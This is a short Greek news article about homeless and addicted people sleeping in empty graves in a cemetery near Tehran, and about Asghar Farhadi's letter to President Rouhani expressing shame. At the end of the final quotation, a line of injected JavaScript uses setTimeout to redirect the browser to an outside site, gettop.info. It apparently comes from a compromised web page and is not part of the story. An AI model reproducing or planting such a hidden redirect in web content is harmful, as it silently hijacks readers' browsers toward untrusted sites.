Σοκ: Άστεγοι κοιμούνται σε άδειους τάφους στην Τεχεράνη

0
7

 

Πενήντα περίπου άνδρες και γυναίκες, άποροι και τοξικομανείς κοιμούνται σε άδειους τάφους στο νεκροταφείο του Σαχριγιάρ, δυτικά της Τεχεράνης, μάι είδηση που αναπαράγουν τα τοπικά ΜΜΕ προκαλώντας σοκ σε ολόκληρη τη χώρα. Μάλιστα, αμέσως μετά τη δημοσιοποίηση των επίμαχων φωτογραφιών, στήθηκε επιχείρηση της αστυνομίας που απομάκρυνσε τους ανθρώπους από τους τάφους.

Ο διάσημος σκηνοθέτης Ασγάρ Φαρχάντι έγραψε στον πρόεδρο Χασάν Ροχανί για να εκφράσει την «ντροπή» του, την ώρα που οι φωτογραφίες αναπαράγονταν στα μέσα κοινωνικής δικτύωσης προκαλώντας την οργή γνωστών Ιρανών καλλιτεχνών και αθλητών.

«Είδα το ρεπορτάζ για τη ζωή των ανδρών, γυναικών και παιδιών στους τάφους του νεκροταφείου στα περίχωρα της Τεχεράνης και όλο μου το είναι γέμισε ντροπή και δάκρυα», έγραψε μεταξύ άλλων ο Ασγάρ Φαρχάντι στην επιστολή προς τον πρόεδρο Ροχανί.

«Θέλω να μοιραστώ την ντροπή μου μαζί με όλους όσοι είχαν θέσεις ευθύνης τις τελευταίες δεκαετίες στη χώρα«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here